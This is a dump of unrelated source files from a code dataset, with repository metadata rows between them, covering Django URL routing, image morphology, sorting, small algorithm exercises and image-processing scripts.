            (r'[-+*/%=,;(){}<>^.!~|&\[\]\?\:]', Operator),
            # NOTE(review): the single-char operator class above already matches
            # the first character of these multi-char operators, so this
            # alternation may be unreachable in practice — verify rule order.
            (r'(>=|<=|==|!=|'
             r'&&|\|\||'
             r'\+=|.=|-=|\*=|/=|%=|<<=|>>=|&=|\|=|\^=|'
             r'>>|<<|'
             r'\+\+|--|=>)', Operator),
            (r'[ \t\r]+', Text),
            # '#' starts a comment running to end of line.
            (r'#[^\n]*', Comment),
        ],
        'escapable-string' : [
            (r'\\[tsn]', String.Escape),
            (r'[^"]', String),
            (r'"', String, '#pop'),
        ],
    }
| [
"chenlongwei@camera360.com"
] | chenlongwei@camera360.com |
ff9be30ad7a3fb60856edfe43f45d57c5a03eb04 | b9a2097b1ff526f0f980cb44f321ecdecc071baf | /backend/nwh_elkhart_metrics_26614/urls.py | 8e7b3ab44b091f930ad0b1b58e0f93406437830a | [] | no_license | crowdbotics-apps/nwh-elkhart-metrics-26614 | ce08c984d6c939b7f7cd5158b5c39fe37be94dcc | e86088482281f83fe789ce0b492e76981df1c08c | refs/heads/master | 2023-05-01T08:17:44.464562 | 2021-05-12T18:42:43 | 2021-05-12T18:42:43 | 366,794,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,580 | py | """nwh_elkhart_metrics_26614 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic.base import TemplateView
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
# Core URL table: app routes, auth, admin, and the versioned REST API.
urlpatterns = [
    path("", include("home.urls")),
    path("accounts/", include("allauth.urls")),
    path("modules/", include("modules.urls")),
    path("api/v1/", include("home.api.v1.urls")),
    path("admin/", admin.site.urls),
    path("users/", include("users.urls", namespace="users")),
    path("rest-auth/", include("rest_auth.urls")),
    # Override email confirm to use allauth's HTML view instead of rest_auth's API view
    path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
    path("rest-auth/registration/", include("rest_auth.registration.urls")),
    path("api/v1/", include("chat.api.v1.urls")),
    path("chat/", include("chat.urls")),
    path("api/v1/", include("chat_user_profile.api.v1.urls")),
    path("chat_user_profile/", include("chat_user_profile.urls")),
    path("home/", include("home.urls")),
    path("api/v1/", include("users.api.v1.urls")),
]

# Branding shown in the Django admin header/titles.
admin.site.site_header = "NWH Elkhart Metrics"
admin.site.site_title = "NWH Elkhart Metrics Admin Portal"
admin.site.index_title = "NWH Elkhart Metrics Admin"
# swagger
# drf-yasg metadata for the generated Swagger UI.
api_info = openapi.Info(
    title="NWH Elkhart Metrics API",
    default_version="v1",
    description="API documentation for NWH Elkhart Metrics App",
)
# API docs are restricted to authenticated users.
schema_view = get_schema_view(
    api_info,
    public=True,
    permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
    path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
# Serve the SPA entry point at the root...
urlpatterns += [path("", TemplateView.as_view(template_name="index.html"))]
# ...and as a catch-all so client-side routes fall through to the same
# template.  This pattern matches everything; keep it last.
urlpatterns += [
    re_path(r"^(?:.*)/?$", TemplateView.as_view(template_name="index.html"))
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
94cf66b41704c274309334be3fe3b838b8a69b17 | 304a2c58a1bd0713b876d093a39a21f3fc7bd3d1 | /skimage/morphology/greyreconstruct.py | 9e447800d30f9549466eb9c8f628a5c0124ea194 | [
"BSD-3-Clause"
] | permissive | ludwigschwardt/scikits-image | 72042e548aa9004d94dbb3da518134be28ba0f4b | 571151958f94842c642f0a17b73968757326e672 | refs/heads/master | 2023-09-05T02:28:15.470227 | 2012-08-27T10:16:40 | 2012-08-27T10:16:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,158 | py | """
This morphological reconstruction routine was adapted from CellProfiler, code
licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
import numpy as np
from skimage.filter._rank_order import rank_order
def reconstruction(seed, mask, method='dilation', selem=None, offset=None):
    """Perform a morphological reconstruction of an image.

    Morphological reconstruction by dilation is similar to basic morphological
    dilation: high-intensity values will replace nearby low-intensity values.
    The basic dilation operator, however, uses a structuring element to
    determine how far a value in the input image can spread. In contrast,
    reconstruction uses two images: a "seed" image, which specifies the values
    that spread, and a "mask" image, which gives the maximum allowed value at
    each pixel. The mask image, like the structuring element, limits the spread
    of high-intensity values. Reconstruction by erosion is simply the inverse:
    low-intensity values spread from the seed image and are limited by the mask
    image, which represents the minimum allowed value.

    Alternatively, you can think of reconstruction as a way to isolate the
    connected regions of an image. For dilation, reconstruction connects
    regions marked by local maxima in the seed image: neighboring pixels
    less-than-or-equal-to those seeds are connected to the seeded region.
    Local maxima with values larger than the seed image will get truncated to
    the seed value.

    Parameters
    ----------
    seed : ndarray
        The seed image (a.k.a. marker image), which specifies the values that
        are dilated or eroded.
    mask : ndarray
        The maximum (dilation) / minimum (erosion) allowed value at each pixel.
    method : {'dilation'|'erosion'}
        Perform reconstruction by dilation or erosion. In dilation (or
        erosion), the seed image is dilated (or eroded) until limited by the
        mask image. For dilation, each seed value must be less than or equal
        to the corresponding mask value; for erosion, the reverse is true.
    selem : ndarray
        The neighborhood expressed as a 2-D array of 1's and 0's.
    offset : ndarray, optional
        The center of ``selem``; derived automatically (and validated to be
        odd-sized) when not given.

    Returns
    -------
    reconstructed : ndarray
        The result of morphological reconstruction.

    Raises
    ------
    ValueError
        If seed/mask intensities violate the ordering required by ``method``,
        or if ``selem`` has an even dimension and no ``offset`` was supplied.

    Notes
    -----
    The algorithm is taken from:
    [1] Robinson, "Efficient morphological reconstruction: a downhill filter",
    Pattern Recognition Letters 25 (2004) 1759-1767.

    Applications for greyscale reconstruction are discussed in:
    [2] Vincent, L., "Morphological Grayscale Reconstruction in Image Analysis:
    Applications and Efficient Algorithms", IEEE Transactions on Image
    Processing (1993)
    [3] Soille, P., "Morphological Image Analysis: Principles and Applications",
    Chapter 6, 2nd edition (2003), ISBN 3540429883.
    """
    assert tuple(seed.shape) == tuple(mask.shape)
    if method == 'dilation' and np.any(seed > mask):
        raise ValueError("Intensity of seed image must be less than that "
                         "of the mask image for reconstruction by dilation.")
    elif method == 'erosion' and np.any(seed < mask):
        raise ValueError("Intensity of seed image must be greater than that "
                         "of the mask image for reconstruction by erosion.")
    try:
        from ._greyreconstruct import reconstruction_loop
    except ImportError:
        raise ImportError("_greyreconstruct extension not available.")

    if selem is None:
        selem = np.ones([3] * seed.ndim, dtype=bool)
    else:
        selem = selem.copy()

    if offset is None:
        if not all(d % 2 == 1 for d in selem.shape):
            # BUG FIX: this ValueError was previously constructed but never
            # raised, so even-sized footprints were silently accepted.
            raise ValueError("Footprint dimensions must all be odd")
        offset = np.array([d // 2 for d in selem.shape])
    # Cross out the center of the selem (tuple indexing: required by NumPy
    # for multidimensional slice indices).
    selem[tuple(slice(d, d + 1) for d in offset)] = False

    # Make padding for edges of reconstructed image so we can ignore boundaries
    padding = (np.array(selem.shape) // 2).astype(int)
    dims = np.zeros(seed.ndim + 1, dtype=int)
    dims[1:] = np.array(seed.shape) + 2 * padding
    dims[0] = 2
    inside_slices = tuple(slice(p, -p) for p in padding)
    # Set padded region to minimum image intensity and mask along first axis so
    # we can interleave image and mask pixels when sorting.
    if method == 'dilation':
        pad_value = np.min(seed)
    elif method == 'erosion':
        pad_value = np.max(seed)
    images = np.ones(dims) * pad_value
    images[(0,) + inside_slices] = seed
    images[(1,) + inside_slices] = mask

    # Create a list of strides across the array to get the neighbors within
    # a flattened array.  Integer (floor) division keeps the strides usable
    # as indices on Python 3 (true division would yield floats).
    value_stride = np.array(images.strides[1:]) // images.dtype.itemsize
    image_stride = images.strides[0] // images.dtype.itemsize
    selem_mgrid = np.mgrid[[slice(-o, d - o)
                            for d, o in zip(selem.shape, offset)]]
    selem_offsets = selem_mgrid[:, selem].transpose()
    nb_strides = np.array([np.sum(value_stride * selem_offset)
                           for selem_offset in selem_offsets], np.int32)

    images = images.flatten()

    # Erosion goes smallest to largest; dilation goes largest to smallest.
    index_sorted = np.argsort(images).astype(np.int32)
    if method == 'dilation':
        index_sorted = index_sorted[::-1]

    # Make a linked list of pixels sorted by value. -1 is the list terminator.
    prev = -np.ones(len(images), np.int32)
    next = -np.ones(len(images), np.int32)
    prev[index_sorted[1:]] = index_sorted[:-1]
    next[index_sorted[:-1]] = index_sorted[1:]

    # Cython inner-loop compares the rank of pixel values.
    if method == 'dilation':
        value_rank, value_map = rank_order(images)
    elif method == 'erosion':
        value_rank, value_map = rank_order(-images)
        value_map = -value_map

    start = index_sorted[0]
    reconstruction_loop(value_rank, prev, next, nb_strides, start, image_stride)

    # Reshape reconstructed image to original image shape and remove padding.
    rec_img = value_map[value_rank[:image_stride]]
    rec_img.shape = np.array(seed.shape) + 2 * padding
    return rec_img[inside_slices]
| [
"tsyu80@gmail.com"
] | tsyu80@gmail.com |
97baeed7c56a0db84cf7856d975f4a404250a4bf | f321c54e5745a21e41842c1cdccaefa5256d918c | /magnetos/utils/string_utils.py | e285d77142c2a32673e542aecca927e326123fca | [
"MIT"
] | permissive | gitshaozhong/magnetos | 5104f90782ac03a2b0b5c86b7333d72b1c27338c | f48dcd7450a46d619dcbe64c11c9aa1c119cd307 | refs/heads/master | 2022-01-05T10:06:04.193597 | 2019-07-12T00:54:05 | 2019-07-12T00:54:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | # -*- coding: utf-8 -*-
# Created by restran on 2017/9/26
from __future__ import unicode_literals, absolute_import
def fixed_length_split(data, width):
    """Split *data* into consecutive chunks of ``width`` characters.

    The last chunk is shorter when ``len(data)`` is not a multiple of
    ``width``; empty input yields an empty list.

    :param data: sequence (typically a string) to split
    :param width: chunk length, a positive integer
    :return: list of consecutive slices of ``data``
    """
    chunks = []
    for start in range(0, len(data), width):
        chunks.append(data[start:start + width])
    return chunks
| [
"grestran@gmail.com"
] | grestran@gmail.com |
1b5ec767df5eb39a49ccdf40dca40eea62760f90 | 0fa82ccc0b93944c4cbb8255834b019cf16d128d | /2020/TopNBuzzWords.py | ace88f6781b44057f221aa1f992be9d1b7504886 | [] | no_license | Akashdeepsingh1/project | 6ad477088a3cae2d7eea818a7bd50a2495ce3ba8 | bdebc6271b39d7260f6ab5bca37ab4036400258f | refs/heads/master | 2022-12-13T23:09:35.782820 | 2020-08-27T14:22:37 | 2020-08-27T14:22:37 | 279,722,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | '''
You work on a team whose job is to understand the most sought after toys for the holiday season. A teammate of yours has built a webcrawler that extracts a list of quotes about toys from different articles. You need to take these quotes and identify which toys are mentioned most frequently. Write an algorithm that identifies the top N toys out of a list of quotes and list of toys.
Your algorithm should output the top N toys mentioned most frequently in the quotes.
Input:
The input to the function/method consists of five arguments:
numToys, an integer representing the number of toys
topToys, an integer representing the number of top toys your algorithm needs to return;
toys, a list of strings representing the toys,
numQuotes, an integer representing the number of quotes about toys;
quotes, a list of strings that consists of space-sperated words representing articles about toys
Output:
Return a list of strings of the most popular N toys in order of most to least frequently mentioned
Note:
The comparison of strings is case-insensitive. If the value of topToys is more than the number of toys, return the names of only the toys mentioned in the quotes. If toys are mentioned an equal number of times in quotes, sort alphabetically.
Example 1:
Input:
numToys = 6
topToys = 2
toys = ["elmo", "elsa", "legos", "drone", "tablet", "warcraft"]
numQuotes = 6
quotes = [
"Elmo is the hottest of the season! Elmo will be on every kid's wishlist!",
"The new Elmo dolls are super high quality",
"Expect the Elsa dolls to be very popular this year, Elsa!",
"Elsa and Elmo are the toys I'll be buying for my kids, Elsa is good",
"For parents of older kids, look into buying them a drone",
"Warcraft is slowly rising in popularity ahead of the holiday season"
];
Output:
["elmo", "elsa"]
'''
def solution(quotes, numToys, topToys, toys):
    """Return the ``topToys`` most frequently mentioned toys.

    Quotes are tokenised case-insensitively, treating the punctuation set
    ``,!.;'"`` as separators (same tokeniser as before).  Ties are broken
    alphabetically, per the problem statement; if fewer than ``topToys``
    toys are mentioned, only the mentioned ones are returned.

    :param quotes: list of sentences to scan
    :param numToys: total number of toys (unused; kept for interface
        compatibility)
    :param topToys: how many top toys to return
    :param toys: list of lowercase toy names to count
    :return: list of toy names, most frequent first
    """
    import re
    from collections import Counter

    toy_set = set(toys)  # O(1) membership instead of scanning the list
    counts = Counter()
    for quote in quotes:
        for word in re.sub(r'''[,!.;'"]+''', " ", quote).lower().split():
            if word in toy_set:
                counts[word] += 1

    # Sort by descending count, then alphabetically on ties.
    # BUG FIX: the previous heap-based version broke ties in
    # reverse-alphabetical order, contradicting the spec (and the
    # documented example, which expects ["elmo", "elsa"]).
    ranked = sorted(counts.items(), key=lambda item: (-item[1], item[0]))
    return [toy for toy, _ in ranked[:topToys]]
numToys = 6
topToys = 2
toys = ["elmo", "elsa", "legos", "drone", "tablet", "warcraft"]
numQuotes = 6
quotes = [
"Elmo is the hottest of the season! Elmo will be on every kid's wishlist!",
"The new Elmo dolls are super high quality",
"Expect the Elsa dolls to be very popular this year, Elsa!",
"Elsa and Elmo are the toys I'll be buying for my kids, Elsa is good",
"For parents of older kids, look into buying them a drone",
"Warcraft is slowly rising in popularity ahead of the holiday season"
]
print (solution (quotes, numToys, topToys, toys)) | [
"Akashdeep_S@Dell.com"
] | Akashdeep_S@Dell.com |
631d16757e7af9733f9944dc7b6eabb43ed2f47e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02691/s319336614.py | 171ddfd157899a75a6f611fe7687282c54e7f3f4 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | import sys
from functools import lru_cache
from collections import defaultdict
inf = float('inf')
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10**6)
def input(): return sys.stdin.readline().rstrip()
def read():
return int(readline())
def reads():
return map(int, readline().split())
x=read()
a=list(reads())
dic=[]
dic2=defaultdict(int)
for i in range(x):
dic.append(i+a[i])
dic2[i-a[i]]+=1
ans=0
#print(dic,dic2)
for i in dic:
ans+=dic2[i]
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
49ac678e7399622d7dbfa5d8fa346354eeae6c27 | c73fc798764f40ea6fa466a573fb01223e367ce3 | /sorting_algo/bubble_sort13_08_3.py | ec228d9d7c593673db252adc5d40e3d6bc431de2 | [] | no_license | mohitsh/python_work | b1385f62104aa6b932f5452ca5c2421526345455 | 223a802dea5cdb73f44a159856c7432983655668 | refs/heads/master | 2020-04-24T00:34:15.427060 | 2018-08-21T19:12:07 | 2018-08-21T19:12:07 | 37,491,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py |
def bubble_sort(alist):
    """Sort *alist* in place (ascending) with bubble sort and return it.

    Each outer pass bubbles the largest remaining element to the end of
    the unsorted prefix, so the scanned region shrinks by one per pass.
    """
    unsorted_len = len(alist) - 1
    while unsorted_len > 0:
        for j in range(unsorted_len):
            if alist[j] > alist[j + 1]:
                # Tuple assignment replaces the explicit temp-variable swap.
                alist[j], alist[j + 1] = alist[j + 1], alist[j]
        unsorted_len -= 1
    return alist
alist = [9,8,7,6,5,4,3,2,1,0]
print alist
print bubble_sort(alist)
| [
"mohitsh114@gmail.com"
] | mohitsh114@gmail.com |
5fe4808fdc7b9720b6dae56130107ff7859b3d6b | 6ceea2578be0cbc1543be3649d0ad01dd55072aa | /src/fipy/solvers/trilinos/preconditioners/jacobiPreconditioner.py | 3e0dbb4faff0fe48dc559db8e9f7fb07afb4f0e3 | [
"LicenseRef-scancode-public-domain"
] | permissive | regmi/fipy | 57972add2cc8e6c04fda09ff2faca9a2c45ad19d | eb4aacf5a8e35cdb0e41beb0d79a93e7c8aacbad | refs/heads/master | 2020-04-27T13:51:45.095692 | 2010-04-09T07:32:42 | 2010-04-09T07:32:42 | 602,099 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,916 | py | #!/usr/bin/env python
##
# -*-Pyth-*-
# ###################################################################
# FiPy - Python-based finite volume PDE solver
#
# FILE: "jacobiPreconditioner.py"
#
# Author: Jonathan Guyer <guyer@nist.gov>
# Author: Daniel Wheeler <daniel.wheeler@nist.gov>
# Author: James Warren <jwarren@nist.gov>
# Author: Maxsim Gibiansky <maxsim.gibiansky@nist.gov>
# mail: NIST
# www: http://www.ctcms.nist.gov/fipy/
#
# ========================================================================
# This software was developed at the National Institute of Standards
# and Technology by employees of the Federal Government in the course
# of their official duties. Pursuant to title 17 Section 105 of the
# United States Code this software is not subject to copyright
# protection and is in the public domain. FiPy is an experimental
# system. NIST assumes no responsibility whatsoever for its use by
# other parties, and makes no guarantees, expressed or implied, about
# its quality, reliability, or any other characteristic. We would
# appreciate acknowledgement if the software is used.
#
# This software can be redistributed and/or modified freely
# provided that any derivative works bear some notice that they are
# derived from it, and any modified versions bear some notice that
# they have been modified.
# ========================================================================
#
# ###################################################################
##
__docformat__ = 'restructuredtext'
from PyTrilinos import AztecOO
from fipy.solvers.trilinos.preconditioners.preconditioner import Preconditioner
class JacobiPreconditioner(Preconditioner):
    """
    Jacobi Preconditioner for Trilinos solvers.
    """
    def _applyToSolver(self, solver, matrix):
        # Select AztecOO's built-in point-Jacobi preconditioner.
        # ``matrix`` is accepted for interface compatibility with other
        # preconditioners but is not needed here.
        solver.SetAztecOption(AztecOO.AZ_precond, AztecOO.AZ_Jacobi)
"regmisk@gmail.com"
] | regmisk@gmail.com |
2ef23df228ff2888553798a422f860c67c12f531 | 9b4de05054f37a65dce49857fb6a809a370b23ca | /gd/migrations/0015_auto_20171223_1531.py | 689f60c8c2b35e98aa6e6472d8595be6fc32c8c3 | [] | no_license | susahe/gis | f6b03b8f23abf7ca22c0069a4cdf603bfe879808 | 6b8d433cd5f672994ac138c1b656136425d0c345 | refs/heads/master | 2021-05-12T01:50:12.862559 | 2018-01-27T02:25:31 | 2018-01-27T02:25:31 | 117,569,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # Generated by Django 2.0 on 2017-12-23 15:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gd', '0014_auto_20171222_2045'),
]
operations = [
migrations.AlterField(
model_name='person',
name='p_birthdate',
field=models.DateField(default='1/1/1977', verbose_name='උපන්දිනය'),
),
migrations.AlterField(
model_name='person',
name='p_donation',
field=models.CharField(choices=[('SD', 'සමෘද්ධි සහනාධාරය'), ('PD', 'මහජන ආධාර'), ('DD', 'රෝගාධාර'), ('SD', 'ශිෂ්\u200dයාධාර'), ('ED', 'වැඩිහිටි ආධාර')], default='SD', max_length=20, verbose_name='රජයෙන් ලබන ආධාර'),
),
migrations.AlterField(
model_name='person',
name='p_edu',
field=models.CharField(choices=[('PS', 'පාසල් යාමට පෙර'), ('PR', 'පෙර පාසැල්'), ('OF', '1-5 ශ්\u200dරේණිය දක්වා'), ('FO', '5 සිට සා/පෙළ දක්වා'), ('OP', 'සාමන්\u200dය පෙළ සමත්'), ('UA', 'උසස් පෙළ දක්වා'), ('AP', 'උසස් පෙළ සමත්'), ('DG', 'උපාධි හා ඊට ඉහල'), ('NS', 'කිසිදා පසැල් නොගිය')], default='OP', max_length=10, verbose_name='අධ්\u200dයාපන සුදුසුකම්'),
),
]
| [
"sumudu.susahe@gmail.com"
] | sumudu.susahe@gmail.com |
16510b4dbee33035e4fd00ce92137fff7639b46b | 9c74814f9bf90529d5ccd7a1dcebe062235ca67c | /third_party/saltedge/test/test_oauth_reconnect_request_body.py | 1c76997806170372a731a2fa2c93794dbc1cbd38 | [
"MIT"
] | permissive | ltowarek/budget-supervisor | 63196fe7cef78f0f54a25891d65870745cc7cf49 | 618e01e15a7a76ed870dafccda399720a02b068b | refs/heads/master | 2021-12-15T06:41:37.531689 | 2021-11-08T19:51:58 | 2021-11-08T19:53:03 | 26,971,315 | 1 | 0 | MIT | 2021-07-04T10:56:24 | 2014-11-21T17:56:36 | Python | UTF-8 | Python | false | false | 1,000 | py | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.oauth_reconnect_request_body import OauthReconnectRequestBody # noqa: E501
from swagger_client.rest import ApiException
class TestOauthReconnectRequestBody(unittest.TestCase):
    """OauthReconnectRequestBody unit test stubs"""

    def setUp(self):
        # No shared fixtures needed for this generated stub.
        pass

    def tearDown(self):
        pass

    def testOauthReconnectRequestBody(self):
        """Test OauthReconnectRequestBody"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.oauth_reconnect_request_body.OauthReconnectRequestBody() # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| [
"lukasz.towarek@gmail.com"
] | lukasz.towarek@gmail.com |
2439b6370f69f389a08685af7bde72b0f33ded1f | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/ac7e62ec08d10df30b76ffd035b8d449a1a097d9-<target_login>-bug.py | 51ff00075ca0161b03de61784815c1b6a53ae43d | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | def target_login(module, target):
node_auth = module.params['node_auth']
node_user = module.params['node_user']
node_pass = module.params['node_pass']
if node_user:
params = [('node.session.auth.authmethod', node_auth), ('node.session.auth.username', node_user), ('node.session.auth.password', node_pass)]
for (name, value) in params:
cmd = ('%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value))
(rc, out, err) = module.run_command(cmd)
if (rc > 0):
module.fail_json(cmd=cmd, rc=rc, msg=err)
cmd = ('%s --mode node --targetname %s --login' % (iscsiadm_cmd, target))
(rc, out, err) = module.run_command(cmd)
if (rc > 0):
module.fail_json(cmd=cmd, rc=rc, msg=err) | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
c2a810bd301d8844f561beed00989c879eb6d363 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02787/s385554448.py | eb0de844cf83ff51298317f61169298255d1ec6e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | H,N = map(int,input().split())
inf = 1000000000
dp = [inf for _ in range(20001)]
magics = []
dp[0] = 0
for i in range(N):
magic = list(map(int,input().split()))
magics.append(magic)
for j in range(10001):
for k in magics:
dp[j+k[0]] = min(dp[j]+k[1],dp[j+k[0]])
ans = dp[H:]
print(min(ans)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
980d5b518857f99a7f02371be9dd4c0741d704b7 | e53b7bbcea1a6f06175a9f14e31d5725fe80e804 | /Question_100/Q11_MeanFilter.py | a8d91f259b3b5bae65693816b60b3a60b2e928ac | [] | no_license | Zpadger/ObjectDetection | 5777c8d78c71dca1af6bccf25b01288dca7100c3 | aa0193a38f3d5c3a318501c3a59e89b73d3e244b | refs/heads/master | 2020-08-16T02:58:45.412713 | 2019-12-14T08:18:51 | 2019-12-14T08:18:51 | 215,446,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #均值滤波
import cv2
import numpy as np
#read image
# read image
img = cv2.imread("imori.jpg")
h, w, c = img.shape

# mean filter
K_size = 3

# zero padding
pad = K_size // 2
# Use the builtin ``float``: the ``np.float`` alias was removed in NumPy 1.24.
out = np.zeros((h + pad * 2, w + pad * 2, c), dtype=float)
out[pad: pad + h, pad: pad + w] = img.copy().astype(float)
tmp = out.copy()

# Replace each pixel with the mean of its K_size x K_size window, per channel.
# BUG FIX: the inner loop was ``for c in range(c)``, which overwrote the
# channel count ``c`` after the first pixel, so every subsequent pixel only
# filtered ``range(2)`` channels and left the last channel untouched.
for y in range(h):
    for x in range(w):
        for ci in range(c):
            out[pad + y, pad + x, ci] = np.mean(tmp[y: y + K_size, x: x + K_size, ci])

out = out[pad: pad + h, pad: pad + w].astype(np.uint8)

# save result
cv2.imwrite("out.jpg", out)
cv2.imshow("result", out)
cv2.waitKey(0)
cv2.destroyAllWindows()
"noreply@github.com"
] | Zpadger.noreply@github.com |
9534e203e71c3a4144e688ecb9c1a247d5e1c057 | f7d28900c8b49748d7b31f3b8dd384042f07fb36 | /misc/glp_stats/collect_glyph_stats.py | 3fd8c44a1fbb977f719fa9b026e673da5d53f1e9 | [] | no_license | TeluguOCR/datagen_initio | 0f2f4823a08bca24a1012fbd0508cdf12ed01dc1 | f405e91f66c770efa6ae94a71430fcec6bae449f | refs/heads/master | 2021-01-10T15:12:45.431308 | 2015-12-06T00:24:02 | 2015-12-06T00:24:02 | 47,477,987 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,080 | py | #! /usr/bin/python
# -*- coding: utf-8 -*-
from PIL import Image
import sys, os, re
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' <Directory>/ \n'
'This Program finds the stats of images of each glyph class'
'Directory is location of the directories containing image files for each glyph')
sys.exit()
dirs_dir = sys.argv[1]
if dirs_dir[-1] != '/':
dirs_dir += '/'
# Akshar_IT_4004018_-5_-28_-4_-27_-3_-26_-6_-29
# Font_Style_ID_T_B_T_B*
def SplitFileName(filename):
    """Parse ``Font_Style_ID_T_B[_T_B...].tif`` into ``(font, style, pairs)``.

    ``pairs`` is a list of ``(top, bottom)`` integer tuples built from the
    trailing underscore-separated numbers.  If any of those fields is not an
    integer, the offending file name is reported and an empty pair list is
    returned.
    """
    # Raw string, and the '.' before 'tif' escaped to match a literal dot.
    m = re.match(r'(.+?)_(..)_.+?(_.+_.+)\.tif', filename)
    font = m.group(1)
    style = m.group(2)
    try:
        # list() forces the int conversions here so ValueError is raised
        # (and caught) eagerly, and the result is indexable on Python 3,
        # where map() returns a lazy iterator.
        dtbs = list(map(int, m.group(3).split('_')[1:]))
    except ValueError:
        print(filename)
        dtbs = []
    dtbpairs = [(dtbs[i], dtbs[i + 1]) for i in range(0, len(dtbs), 2)]
    return font, style, dtbpairs
# One CSV row per glyph image, plus an incremental per-class average image
# written to /tmp/avgs/.
out_file = open('/tmp/' + dirs_dir[:-1].replace("/","_") + ".csv", 'w')
out_file.write("char font style wd ht xht normtop normbot normwd normht\n")
out_dir = '/tmp/avgs/'
if not os.path.exists(out_dir): os.makedirs(out_dir)

NMXHT = 16 # This is the normalised height of the letter x (or ja in Telugu)
NMTOP = int(1.1 * NMXHT)
NMBOT = int(1.3 * NMXHT)
NMWID = 5 * NMXHT
NMHIT = NMTOP + NMXHT + NMBOT

idir = 0
for dirpath, dirnames, filenames in os.walk(dirs_dir):
    # Each sub-directory holds the sample images of one glyph class.
    print idir, dirpath
    idir += 1
    big_im = Image.new("L", (NMWID, NMHIT), "white")
    big_im.load()
    char = os.path.basename(dirpath)
    nimgs = 0
    for filename in filenames:
        # Sanity Checks and open
        if filename[-4:] != '.tif':
            print filename
            continue
        try:
            full_path = os.path.join(dirpath, filename)
        except NameError:
            print dirpath, filename
            raise
        # Open image and process
        im = Image.open(full_path)
        wd, ht = im.size
        font, style, dtbpairs = SplitFileName(filename)
        # Only the first (top, bottom) pair is used — note the break below.
        for dt, db in dtbpairs:
            xht = dt + ht - db
            scalef = float(NMXHT)/xht
            normtop = int(scalef * dt)
            normbot = int(scalef * db) + NMXHT
            normwd = int(scalef * wd)
            normht = int(scalef * ht)
            # Write the stats to a file
            line = " ".join(map(str, (char, font, style, wd, ht, xht, normtop, normbot, normwd, normht)))
            out_file.write(line+"\n")
            break
        # Scale and blend to get average
        #print nimgs
        # NOTE(review): normwd/normtop may be unbound here when dtbpairs was
        # empty (malformed file name) — the blend below would then raise
        # NameError through the bare re-raise.
        try:
            nimgs = nimgs + 1
            im.load()
            im = im.convert('L')
            im = im.resize((normwd, normht))
            im2 = Image.new("L", (NMWID, NMHIT), "white")
            im2.load()
            im2.paste(im, (0, NMTOP + normtop))
            im2.load()
            # Blending with weight 1/n keeps an incremental running mean.
            big_im = Image.blend(big_im, im2, 1./nimgs)
        except:
            raise
            # NOTE(review): unreachable after the raise above.
            print char, nimgs, big_im.size, im2.size
            continue
    try:
        big_im.save(out_dir + char + '.tif', 'TIFF')
    except:
        pass
out_file.close()
| [
